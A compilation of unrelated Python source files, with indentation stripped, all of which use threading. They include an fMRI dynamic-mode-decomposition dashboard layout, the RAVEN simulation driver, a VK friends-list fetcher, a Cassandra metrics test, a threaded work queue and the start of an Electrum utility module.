raise ImportError("Problem reading the csv file.")
data.append(d)
logging.info("Extracting information from file...")
dcp = Decomposition(data=data, sampling_time=sampling_time)
self.atlas = dcp.atlas
return dcp
def _filter_spectre():
""" Filter df for Spectre Figure. """
logging.info("Filtering Spectre data")
if self.dcp2 is not None:
return self.dcp1.df, ['Group 1', 'Group 2'], self.dcp2.df
elif self.match_group is not None:
return self.dcp1.df, ['Reference', 'Match'], self.match_group.df
else:
return self.dcp1.df, [''], None
def _filter_time():
""" Filter df for Timeplot Figure. """
logging.info("Filtering TimePlot data")
return self.dcp1.df, self.dcp2.df if self.dcp2 is not None else None
def _filter_radar():
""" Filter df for Radar Figure. """
logging.info("Filtering Radar data")
if self.dcp2 is not None:
assert self.dcp1.atlas == self.dcp2.atlas
return self.dcp1.df, self.dcp1.atlas, self.dcp2.df if self.dcp2 is not None else None
def _filter_brain(order):
"""
Filter brain information.
:param order: [int] mode order
:return atlas: [str] cortical atlas
:return mode1: [pd.DataFrame] for mode 1
:return mode2: [pd.DataFrame] for mode 2
:return order: [int] mode order
"""
logging.info("Filtering Brain data for Mode {}".format(order))
return self.dcp1.df, order, self.dcp1.atlas.coords_2d, self.dcp2.df if self.dcp2 is not None else None
def _format_table(df):
"""
Format table
:param df: [pd.DataFrame] data
:return: [pd.DataFrame]
"""
def _set_precision(number):
if number == np.inf:
return 'inf'
if type(number) != str:
number = str(number)
splat = number.split('.')
splat[1] = splat[1][:5] if len(splat[1]) > 5 else splat[1]
return ".".join([splat[0], splat[1]])
def _handle_complex(number):
splat = [str(number.real), str(np.abs(number.imag))]
sett = [_set_precision(splat[0]), _set_precision(splat[1])]
return "{0} +/- {1} j".format(sett[0], sett[1])
def _format_list(p):
f = _handle_complex if type(p[0]) == np.complex128 else _set_precision
return [f(e) for e in p]
df['value'] = _format_list(df['value'])
df['damping_time'] = _format_list(df['damping_time'])
df['period'] = _format_list(df['period'])
return df
def _create_table(df, id=None, columns=None, config=None):
"""
Create table.
:param df: [pd.DataFrame] data
:param id: [str] id in app.layout
:param columns: [list] following Dash rules
:param config: [dict] of config elements for table
:return: [html.Div] containing DataTable
"""
if df is None:
return None
else:
data = _format_table(df).to_dict('records')
return html.Div(className="container mt-4", children=[DataTable(id=id, data=data,
columns=columns, **config)])
self.app.run_server(debug=False, port=port, host=address)
@staticmethod
def _get_app_layout():
logging.info("Setting Application Layout")
return html.Div(id="app-layout", style=dict(maxWidth='95vw'), children=[
dbc.Modal(id="help-modal", is_open=True, children=[
dbc.ModalHeader("Welcome to the Dynamic Mode Decomposition Dashboard!"),
dbc.ModalBody(children=[
html.P("Based on 'Dynamic mode decomposition of resting-state and task fMRI' by Casorso et al, \
the dmd dashboard allows you to analyse, compare, and display the dynamic decomposition of \
fMRI time-series data."),
html.H5("Analysis"),
html.P("Analyse the decomposition of one or multiple time-series files. Simply input the sampling \
time, select the wanted file(s) and the amount of modes you want to have visualisations \
for."),
html.H5("Comparison"),
html.P("The comparison setting allows you to analyse two different groups of file(s) and visualize \
the similarities and/or differences in their decompositions."),
html.H5("Match Modes"),
html.P("The Match Modes setting allows you to match a group's decomposition to a reference group. \
For this setting, it is important to select the Reference group before the Match group. "
"As the mode matching is a heavy computational task, we allow you to approximate the top "
"10 modes using an approximation degree that should be between 0 and 100. Please note that "
"the higher the approximation degree, the longer the program will run. \
Furthermore, please identify the approximation degree before uploading the Match data."),
html.P("This pop-up remains accessible by clicking on the Help button.", className="mt-3"),
html.P("If you have any questions, do not hesitate to open an issue on the Github repository or contact \
me directly by email: arnaud.dhaene@epfl.ch", className="mt-5")
]),
]),
dbc.Modal(id="help-modal-selection", is_open=False, children=[
dbc.ModalHeader("Welcome to the Selection toolbar!"),
dbc.ModalBody(children=[
html.P("This is where you can input all the parameters for the decomposition visualization."),
html.H5("File Selection"),
html.P("The dashboard accepts either MATLAB or csv files. For MATLAB files, the object "
"corresponding to the last key in the file structure dictionary will be chosen. "
"If everything goes according to plan, the name(s) of your file(s) are displayed just above "
"the selection buttons. "
"Error messages will be displayed under the selection buttons. If anything goes wrong, "
"make sure to also check the log, where a Traceback is always displayed."),
html.H5("Sampling Time (seconds)"),
html.P("Here, you can input the sampling time of your recording. This is used for the visualization"
" that shows the activity of each mode versus time."),
html.H5("Number of modes"),
html.P("A straightforward parameter. As computation can be heavy for the cortical surface plots, "
"you can decide the first n modes to be visualized. If you want to plot a specific mode, "
"please refer to the `nidmd` Python module documentation examples."),
html.H5("[Mode Matching] Approximation degree"),
html.P("As the top 10 match group modes are approximated using a specific number of modes, "
"an approximation degree is introduced that ranges between 0 and 100. This is relative "
"to the percentage of the total modes used for the approximation. For instance, if you want "
"to use the first 50 modes of Schaefer data, 50 / 400 --> approximation degree: 25"),
html.H5("Plot imaginary values"),
html.P("It is completely up to you to decide whether or not you wish to plot the imaginary values "
"of the decomposition."),
html.P("If you have any questions, do not hesitate to open an issue on the Github repository or "
"contact me directly by email: arnaud.dhaene@epfl.ch", className="mt-5")
]),
]),
html.Div(className="row", children=[
# ########### #
# RIGHT PANEL #
# ########### #
html.Div(className="col-4", children=[
# ####################### #
# HEADER + FILE SELECTION
# ####################### #
# HEADER = TITLE + DESCRIPTION + SETTING
html.Div(style={'margin-top': '25px'}, children=[
dbc.FormGroup(row=True, children=[
html.Div(className="ml-5 mt-2", children=[
# TITLE
html.H5("Dynamic Mode Decomposition Dashboard"),
html.P("Access a short description of the dashboard by clicking on 'Help'. \
A more detailed description can be found in the repository's README."),
# DESCRIPTION
dbc.Button("Help", id="help-general", className="mr-2"),
dbc.Button("Reset", color="primary", id="reset"),
]),
dbc.Col(className="ml-5 mt-4", children=[
# SETTING
dbc.Label("Setting", className="mt-2"),
dbc.RadioItems(id="setting", options=[
{"label": "Analysis", "value": 1},
{"label": "Comparison", "value": 2},
{"label": "Mode Matching", "value": 3}
])
])
])
]),
# FILE SELECTION
html.Div(className="col-12", children=[
html.Div(className="mt-2 mb-2 mr-2 ml-2", id="file-selection-card", children=[
dbc.Card(dbc.CardBody(children=[
# TITLE
html.H5("Selection", className="card-title"),
html.Div(children=[
# SELECTION INPUT
html.Div(children=[
dbc.FormGroup(children=[
dbc.Label("Sampling Time (seconds)", className="mt-2"),
dbc.Input(id="sampling-time", type="number", placeholder="0.72",
value=0.72),
dbc.Label("Number of modes to plot", className="mt-2"),
dbc.Input(id="number-of-modes", type="number", placeholder="5",
value=5),
html.Div(id="approx-deg-div", children=[
dbc.Label("Approximation degree", className="mt-2"),
dbc.Input(id="approx-deg", type="number", placeholder="5",
value=5)
]),
dbc.Checklist(className="mt-2", id="imag-setting", value=[], switch=True,
options=[dict(label="Plot Imaginary Values", value=1)]),
]),
]),
# SELECTED FILES
html.Div(children=[
dbc.Label(id="selected-files-group-1-t"),
html.P(id="selected-files-group-1-p"),
html.Div(className="mb-2", id="animated-progress-1-div", children=[
dbc.Progress(value=80, id="animated-progress-1", striped=True,
animated="animated", style={'display': 'none'})
]),
dbc.Label(id="selected-files-group-2-t"),
html.P(id="selected-files-group-2-p"),
html.Div(id="animated-progress-2-div", className="mb-2", children=[
dbc.Progress(value=80, id="animated-progress-2", striped=True,
animated="animated", style={"display": "none"})
]),
html.Div(id="import-alert", className="text-danger mt-2")
]),
]),
# BUTTONS + ALERT MESSAGE
html.Div(children=[
dbc.Button("Help", id="help-selection", className="mr-2"),
dbc.Button("Run", color="primary", id="run", className="mr-2"),
html.Div(id="message-alert", className="text-danger mt-2")
]),
]))
]),
]),
]),
# ########### #
# RIGHT PANEL #
# ########### #
html.Div(className="col-8", children=[
# ########## #
# UPLOAD ROW
# ########## #
html.Div(className="row", id="upload-row", children=[
# UPLOAD 1
html.Div(id="upload-1-div", children=[
dcc.Upload(id="upload-1", multiple=True)
]),
# UPLOAD 2
html.Div(id="upload-2-div", children=[
dcc.Upload(id="upload-2", multiple=True)
])
]),
# ####### #
# CONTENT #
# ####### #
# TABS = GRAPHS + TABLE 1 + TABLE 2 + LOG
dbc.Tabs(className="mt-3", children=[
# GRAPHS
dbc.Tab(label="Graphs", children=[
# RADAR + SPECTRE + TIMEPLOT
html.Div(className="row", children=[
# RADAR
html.Div(className="col-6", children=[
html.Div(children=[
dcc.Graph(id="radar",
config=dict(displaylogo=False,
toImageButtonOptions=dict(
width=None, height=None,
format="svg", filename="radar")))
]),
]),
# SPECTRE
html.Div(className="col-6", children=[
html.Div(children=[
dcc.Graph(id="spectre",
config=dict(displaylogo=False,
toImageButtonOptions=dict(
width=None, height=None,
format="svg", filename="spectre")))
]),
]),
]),
# TIMEPLOT
html.Div(children=[
html.Div(children=[
dcc.Graph(id="timeplot",
config=dict(displaylogo=False,
toImageButtonOptions=dict(
width=None, height=None,
format="svg", filename="timeplot")))
]),
]),
]),
# BRAINS
dbc.Tab(label="Cortical Plots", id="brains-tab", children=[
# BRAINS
html.Div(className="col-12", id="brains"),
# PROGRESS
html.Div(className="col-12 my-4 mx-4", id="progress-div", children=[
html.P('Loading cortical surface graphs...', className="mt-4"),
dcc.Interval(id="progress-interval", n_intervals=0, interval=500),
dbc.Progress(id="progress", style=dict(width='70%', align='center')),
]),
]),
# TABLE 1
dbc.Tab(label="Group A", id="table-1-tab"),
# TABLE 2
dbc.Tab(label="Group B", disabled=True, id="table-2-tab"),
# LOG
dbc.Tab(label="Log", id='log-tab', children=[
html.Div(className="col-12", id="log-div", style=dict(overflow='scroll',
height='90vh'),
children=[
dcc.Interval(id='log-update', interval=3000), # interval in milliseconds
html.Div(id='log', children=[
html.P("———— APP START ————"),
]),
]),
]),
]),
]),
]),
])
|
Driver.py
|
#!/usr/bin/env python
# Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Created on Feb 20, 2013
@author: crisr
This is the Driver of RAVEN
"""
#For future compatibility with Python 3
from __future__ import division, print_function, absolute_import
import warnings
warnings.simplefilter('default',DeprecationWarning)
#End compatibility block for Python 3
#External Modules--------------------begin
import xml.etree.ElementTree as ET
import os
import sys
import threading
import time
import traceback
#External Modules--------------------end
#warning: this needs to be before importing h5py
os.environ["MV2_ENABLE_AFFINITY"]="0"
frameworkDir = os.path.dirname(os.path.abspath(__file__))
from utils import utils
import utils.TreeStructure as TS
utils.find_crow(frameworkDir)
if sys.version_info.major == 2:
utils.add_path_recursively(os.path.join(frameworkDir,'contrib','pp'))
else:
utils.add_path_recursively(os.path.join(frameworkDir,'contrib','pp3'))
utils.add_path(os.path.join(frameworkDir,'contrib','AMSC'))
utils.add_path(os.path.join(frameworkDir,'contrib'))
#Internal Modules
from Simulation import Simulation
from Application import __QtAvailable
from Interaction import Interaction
#Internal Modules
#------------------------------------------------------------- Driver
def printStatement():
"""
Method to print the BEA header
@ In, None
@ Out, None
"""
print("""
Copyright 2017 Battelle Energy Alliance, LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
""")
def printLogo():
"""
Method to print a RAVEN logo
@ In, None
@ Out, None
"""
print("""
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.---. .------###### ##### ### ### ######## ### ###
/ \ __ / --### ### ### ### ### ### ### ##### ###
/ / \( )/ --### ### ### ### ### ### ###### ### ######
////// ' \/ ` --####### ######### ### ### ### ### #####
//// / // : : -### ### ### ### ###### #### ### ####
// / / /` '---### ### ### ### ### ######## ### ###
// //..\\
===========UU====UU=============================================================
'//||\\`
''``
""")
def checkVersions():
"""
Method to check if versions of modules are new enough. Will call sys.exit
if they are not in the range specified.
@ In, None
@ Out, None
"""
sys.path.append(os.path.join(os.path.dirname(frameworkDir),"scripts","TestHarness","testers"))
import RavenUtils
sys.path.pop() #remove testers path
missing,outOfRange,notQA = RavenUtils.check_for_missing_modules(False)
if len(missing) + len(outOfRange) > 0 and RavenUtils.check_versions():
print("ERROR: too old, too new, or missing raven libraries, not running:")
for error in missing + outOfRange + notQA:
print(error)
sys.exit(-4)
else:
if len(missing) + len(outOfRange) > 0:
print("WARNING: not using tested versions of the libraries:")
for warning in notQA + missing + outOfRange:
print(warning)
if __name__ == '__main__':
"""This is the main driver for the RAVEN framework"""
# Retrieve the framework directory path and working dir
printLogo()
printStatement()
checkVersions()
verbosity = 'all'
interfaceCheck = False
interactive = Interaction.No
workingDir = os.getcwd()
## Remove duplicate command line options and preserve order so if they try
## conflicting options, the last one will take precedence.
sys.argv = utils.removeDuplicates(sys.argv)
itemsToRemove = []
for item in sys.argv:
# I don't think these do anything. - talbpaul, 2017-10
if item.lower() in ['silent','quiet','all']:
verbosity = item.lower()
itemsToRemove.append(item)
elif item.lower() == 'interfacecheck':
interfaceCheck = True
itemsToRemove.append(item)
elif item.lower() == 'interactive':
if __QtAvailable:
interactive = Interaction.Yes
else:
print('Qt is not available, disabling interactive mode.\n')
itemsToRemove.append(item)
elif item.lower() == 'interactivecheck':
if __QtAvailable:
interactive = Interaction.Test
else:
print('Qt is not available, disabling interactive check.\n')
itemsToRemove.append(item)
## Now outside of the loop iterating on the object we want to modify, we are
## safe to remove each of the items
for item in itemsToRemove:
sys.argv.remove(item)
if interfaceCheck:
os.environ['RAVENinterfaceCheck'] = 'True'
print('Interface CHECK activated!\n')
else:
os.environ['RAVENinterfaceCheck'] = 'False'
simulation = Simulation(frameworkDir, verbosity=verbosity, interactive=interactive)
#If a configuration file exists, read it in
configFile = os.path.join(os.path.expanduser("~"),".raven","default_runinfo.xml")
if os.path.exists(configFile):
tree = ET.parse(configFile)
root = tree.getroot()
if root.tag == 'Simulation' and [x.tag for x in root] == ["RunInfo"]:
simulation.XMLread(root,runInfoSkip=set(["totNumCoresUsed"]),xmlFilename=configFile)
else:
e=IOError('DRIVER',str(configFile)+' should only have Simulation and inside it RunInfo')
print('\nERROR! In Driver,',e,'\n')
sys.exit(1)
# Find the XML input file
if len(sys.argv) == 1:
#NOTE: This can be overriden at the command line:
# python Driver.py anotherFile.xml
# or in the configuration file by DefaultInputFile
inputFiles = [simulation.getDefaultInputFile()]
else:
inputFiles = sys.argv[1:]
for i in range(len(inputFiles)):
if not os.path.isabs(inputFiles[i]):
inputFiles[i] = os.path.join(workingDir,inputFiles[i])
simulation.setInputFiles(inputFiles)
#Parse the input
#For future developers of this block, assure that useful, informative exceptions
# are still thrown while parsing the XML tree. Otherwise any error made by
# the developer or user might be obfuscated.
for inputFile in inputFiles:
try:
tree = TS.parse(open(inputFile,'r'))
except TS.InputParsingError as e:
print('\nInput Parsing error!',e,'\n')
sys.exit(1)
#except? riseanIOError('not possible to parse (xml based) the input file '+inputFile)
if verbosity=='debug':
print('DRIVER','opened file '+inputFile)
root = tree.getroot()
if root.tag != 'Simulation':
e=IOError('The outermost block of the input file '+inputFile+' it is not Simulation')
print('\nInput XML Error!',e,'\n')
sys.exit(1)
# call the function to load the external xml files into the input tree
cwd = os.path.dirname(os.path.abspath(inputFile))
simulation.XMLpreprocess(root,cwd)
#generate all the components of the simulation
#Call the function to read and construct each single module of the simulation
simulation.XMLread(root,runInfoSkip=set(["DefaultInputFile"]),xmlFilename=inputFile)
def raven():
"""
A worker function that allows the computation of the main RAVEN execution
to be offloaded to another thread, freeing the main thread for UI
interaction (Qt requires UI to be handled on the main thread of execution)
"""
simulation.initialize()
simulation.run()
## If there is an associated UI application, then we can quit it now that
## we are done, the main thread does not know when this done presumably
## because this thread still is technically running as long as the app,
## which both threads can see, has not called quit. Otherwise, we could do
## this after the while loop below.
if simulation.app is not None:
simulation.app.quit()
if simulation.app is not None:
try:
## Create the thread that will run RAVEN, and make sure that it will die if
## the main thread dies by making it a daemon, then start it up
ravenThread = threading.Thread(target=raven)
ravenThread.daemon = True
ravenThread.start()
## If there is an associated application, then we can start it up now as
## well. It will listen for UI update requests from the ravenThread.
if simulation.app is not None:
simulation.app.exec_()
## This makes sure that the main thread waits for RAVEN to complete before
## exiting, however join will block the main thread until ravenThread is
## complete, thus ignoring any kill signals until after it has completed
# ravenThread.join()
waitTime = 0.1 ## in seconds
## So, in order to live wait for ravenThread, we need a spinlock that will
## allow us to accept keyboard input.
while ravenThread.isAlive():
## Use one of these two alternatives, effectively they should be the same
## not sure if there is any advantage to one over the other
time.sleep(waitTime)
# ravenThread.join(waitTime)
except KeyboardInterrupt:
if ravenThread.isAlive():
traceback.print_stack(sys._current_frames()[ravenThread.ident])
print ('\n\n! Received keyboard interrupt, exiting RAVEN.\n\n')
except SystemExit:
if ravenThread.isAlive():
traceback.print_stack(sys._current_frames()[ravenThread.ident])
print ('\n\n! Exit called, exiting RAVEN.\n\n')
else:
raven()
|
SecondLevel.py
|
import threading
from vkconnections import VkAPI as API
class SecondDivision:
def __init__(self, list_of_vk_script, token):
self.listOfVkScript = list_of_vk_script
self.token = token
self.data = []
def execute(self):
listOutput = []
for item in self.listOfVkScript:
temp = API.get_execute(item, self.token)
listOutput.append(temp)
self.data = listOutput
def get_data(self):
return self.data
# input: list of users' ids
# output: list of lists of friends
def get_list_of_friends(all_the_users, two_tokens, thread_name):
firstList, secondList = get_half_of_vk_script(all_the_users)
firstList, secondList = make_second_division(firstList, secondList, two_tokens, thread_name)
return get_full_list(firstList, secondList)
def get_half_of_vk_script(all_the_users):
list_of_vk_script = API.get_vk_script_for_execute(all_the_users)
middle = len(list_of_vk_script) // 2
first_list = list_of_vk_script[:middle]
second_list = list_of_vk_script[middle:]
return first_list, second_list
def make_second_division(first_list, second_list, two_tokens, thread_name):
first_half_second_division = SecondDivision(first_list, two_tokens[1])
second_half_second_division = SecondDivision(second_list, two_tokens[2])
first_list = threading.Thread(target=first_half_second_division.execute, name=thread_name + 'Second Division - 1')
second_list = threading.Thread(target=second_half_second_division.execute, name=thread_name + 'Second Division - 2')
first_list.start()
second_list.start()
first_list.join()
second_list.join()
first_list = first_half_second_division.get_data()
second_list = second_half_second_division.get_data()
return first_list, second_list
def get_full_list(first_list, second_list):
list_output = first_list + second_list
return_list = []
for item in list_output:
for iterator in item:
return_list.append(iterator)
return return_list
|
MapperController.py
|
'''
Created on Nov 22, 2021
@author: Japi42
'''
import threading
import time
from ECL_config import main_config
condition = threading.Condition()
def startup():
ut = threading.Thread(name='UpdateMappersThread', target=updateMappersThread, daemon=True)
ut.start()
def updateMappersThread():
print("Start Mapper Thread")
while True:
with condition:
for mapper_id in main_config.mappers:
mapper = main_config.mappers[mapper_id]
mapper.update()
time.sleep(0.01)
|
test_cassandra.py
|
# (C) Datadog, Inc. 2010-2017
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
# stdlib
import threading
import time
from types import ListType
import unittest
import os
import mock
# 3p
from nose.plugins.attrib import attr
# project
from aggregator import MetricsAggregator
import logging
LOG_INFO = {
'log_to_event_viewer': False,
'log_to_syslog': False,
'syslog_host': None,
'syslog_port': None,
'log_level': logging.INFO,
'disable_file_logging': True,
'collector_log_file': '/var/log/sd-agent/collector.log',
'forwarder_log_file': '/var/log/sd-agent/forwarder.log',
'sdstatsd_log_file': '/var/log/sd-agent/sdstatsd.log',
'jmxfetch_log_file': '/var/log/sd-agent/jmxfetch.log',
'go-metro_log_file': '/var/log/sd-agent/go-metro.log',
}
with mock.patch('config.get_logging_config', return_value=LOG_INFO):
from sdstatsd import Server
from jmxfetch import JMXFetch
log = logging.getLogger('cassandra_test')
STATSD_PORT = 8121
class DummyReporter(threading.Thread):
def __init__(self, metrics_aggregator):
threading.Thread.__init__(self)
self.finished = threading.Event()
self.metrics_aggregator = metrics_aggregator
self.interval = 10
self.metrics = None
self.finished = False
self.start()
def run(self):
while not self.finished:
time.sleep(self.interval)
self.flush()
def flush(self):
metrics = self.metrics_aggregator.flush()
if metrics:
self.metrics = metrics
@attr(requires='cassandra')
class JMXTestCase(unittest.TestCase):
def setUp(self):
aggregator = MetricsAggregator("test_host")
self.server = Server(aggregator, "localhost", STATSD_PORT)
self.reporter = DummyReporter(aggregator)
self.t1 = threading.Thread(target=self.server.start)
self.t1.start()
confd_path = os.path.join(os.path.dirname(__file__))
self.jmx_daemon = JMXFetch(confd_path, {'sdstatsd_port': STATSD_PORT})
self.t2 = threading.Thread(target=self.jmx_daemon.run)
self.t2.start()
def tearDown(self):
self.server.stop()
self.reporter.finished = True
self.jmx_daemon.terminate()
def testCustomJMXMetric(self):
count = 0
while self.reporter.metrics is None:
time.sleep(1)
count += 1
if count > 25:
raise Exception("No metrics were received in 25 seconds")
metrics = self.reporter.metrics
self.assertTrue(isinstance(metrics, ListType))
self.assertTrue(len(metrics) > 0)
log.info([t for t in metrics if "cassandra." in t['metric'] and "instance:cassandra_instance" in t['tags']])
log.info(metrics)
log.info(len([t for t in metrics if "cassandra." in t['metric'] and "instance:cassandra_instance" in t['tags']]))
log.info(len([t for t in metrics if "instance:cassandra_instance" in t['tags']]))
log.info(len([t for t in metrics if "cassandra." in t['metric']]))
log.info(len(metrics))
self.assertTrue(len([t for t in metrics if "cassandra." in t['metric'] and "instance:cassandra_instance" in t['tags']]) > 40, metrics)
|
thread_worker_queue.py
|
import copy
import threading
import queue
class SingleTaskListener():
def __init__(self):
self.ev = threading.Event()
def wait(self):
self.ev.wait()
def notify(self, _id, _data):
self.ev.set()
class MultipleTaskListener():
def __init__(self, count):
self.count = 0
self.expected = count
self.ev = threading.Event()
def wait(self):
self.ev.wait()
def notify(self, _id, _data):
self.count += 1
if self.count == self.expected:
self.ev.set()
class TaskFuture():
def __init__(self):
self.data = None
def notify(self, _id, _data):
if(_data != None):
self.data = copy.deepcopy(_data)
class ThreadedWorkQueue(object):
def __init__(self):
self.queue = queue.Queue()
self.thread_handle = None
self.work_lock = threading.Lock()
self.tasks = {}
self.payload = {}
self.context_id = None
self.context_copy = None
self.listeners = None
def start(self):
self.work_lock.acquire()
self.thread_handle = threading.Thread(target=lambda e: e.thread_run_loop(), args=(self,), daemon=True)
self.thread_handle.start()
self.work_lock.release()
def _stop_active_task(self, _id):
pass
def stop(self):
self.work_lock.acquire()
if self.thread_handle == None:
self.work_lock.release()
return
#flush queue
_tasks = self.tasks
_payload = self.payload
self.tasks = {}
self.payload = {}
self.queue.put(None)
if self.context_id != None:
self.tasks[self.context_id] = _tasks[self.context_id]
self.payload[self.context_id] = _payload[self.context_id]
del _tasks[self.context_id]
del _payload[self.context_id]
self._stop_active_task(self.context_id)
for i,v in _tasks.items():
self._task_removed(i, copy.deepcopy(v), _payload[i])
self.work_lock.release()
self.thread_handle.join()
self.thread_handle = None
#discard a queued item, item must not be started, if it's started then discard will fail
def remove(self, _id):
self.work_lock.acquire()
if _id != self.context_id:
self._try_remove_task(_id)
self.work_lock.release()
def _task_removed(self, _id, _data, _payload):
pass
def _try_remove_task(self, _id):
data = self.tasks.get(_id,None)
if data != None:
_p = self.payload[_id]
del self.tasks[_id]
del self.payload[_id]
self._task_removed(_id, copy.deepcopy(data), _p)
#add item to queue
def add(self, _id, _item_dict, _payload):
self.work_lock.acquire()
if self.tasks == None or _id in self.tasks:
self.work_lock.release()
return False
self.tasks[_id] = _item_dict
self.payload[_id] = _payload
self.work_lock.release()
self.queue.put(_id)
return True
def query_items(self):
self.work_lock.acquire()
result = copy.deepcopy(self.tasks)
if self.context_copy != None:
result[self.context_id] = copy.deepcopy(self.context_copy)
self.work_lock.release()
return result
def query_status(self):
status = None
tasks = None
active = None
self.work_lock.acquire()
if (self.thread_handle != None):
status = "active"
else:
status = "inactive"
tasks = copy.deepcopy(self.tasks)
if self.context_copy != None:
active = copy.deepcopy(self.context_copy)
self.work_lock.release()
return {
"status" : status,
"queue" : tasks,
"active" : active
}
def is_active(self):
self.work_lock.acquire()
if self.thread_handle == None:
self.work_lock.release()
return False
result = len(self.tasks)
self.work_lock.release()
if result > 0:
return True
return False
def wait(self):
self.work_lock.acquire()
sz = len(self.tasks)
if sz > 0:
ev = threading.Event()
func = lambda: ev.set()
if self.listeners == None:
self.listeners = [func]
else:
self.listeners.append(func)
self.work_lock.release()
ev.wait()
return;
self.work_lock.release()
def prepare_task(self, _id, _itm):
return copy.deepcopy(_itm), self.payload.get(_id, None)
def execute_active_task(self, _id, _payload):
pass
def task_finished(self, _id, _task_copy, _payload):
del self.tasks[_id]
del self.payload[_id]
if len(self.tasks) == 0 and self.listeners != None:
l = self.listeners
self.listeners = None
for func in l:
func()
def acquire_active_context(self):
self.work_lock.acquire()
return self.context_copy
def release_active_context(self, _ctx):
self.work_lock.release()
def thread_run_loop(self):
while True:
_id = self.queue.get()
if _id == None:
break
self.work_lock.acquire()
_item = self.tasks.get(_id,None)
if _item != None:
_work_item_copy, _exec_payload = self.prepare_task(_id, _item)
self.context_id = _id
self.context_copy = _work_item_copy
self.work_lock.release()
self.execute_active_task(_id, _exec_payload)
self.work_lock.acquire()
self.context_id = None
self.context_copy = None
self.task_finished(_id, _work_item_copy, _exec_payload)
#else: item could be removed before it was processed
self.work_lock.release()
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'XUEZ':8, 'mXUEZ':5, 'uXUEZ':2}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
# Raised when importing a key that's already in the wallet.
class AlreadyHaveAddress(Exception):
def __init__(self, msg, addr):
super(AlreadyHaveAddress, self).__init__(msg)
self.addr = addr
class NotEnoughFunds(Exception): pass
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
